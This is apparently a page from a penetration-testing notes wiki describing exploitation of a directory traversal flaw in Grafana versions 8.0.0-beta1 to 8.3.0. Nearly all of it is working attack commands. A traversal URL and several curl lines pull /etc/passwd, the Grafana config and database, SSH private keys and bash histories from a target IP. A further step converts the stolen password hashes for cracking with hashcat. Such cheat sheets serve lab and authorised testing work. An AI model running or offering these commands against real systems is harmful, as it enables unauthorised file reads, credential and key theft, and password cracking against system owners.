Grafana

Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read

http://10.10.99.76:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Grafana Conf File

/etc/grafana/grafana.ini

Interesting LFI Files

curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../etc/passwd -o passwd
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../etc/grafana/grafana.ini -o grafana.ini
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../root/.ssh/id_rsa
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../root/.bash_history
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../home/grafana/.ssh/id_rsa
curl --path-as-is http://10.10.99.76:3000/public/plugins/mysql/../../../../../../../../home/grafana/.bash_history

Grafana2Hashcat

We can convert the hashes from graphana to hashcat using this tool

Hashes should be in this format

HASH,SALT

python3 grafana2hashcat.py grafana_hashes.txt -o output-hash.txt

PreviousJenkins NextNmap Commands

Last updated 2 months ago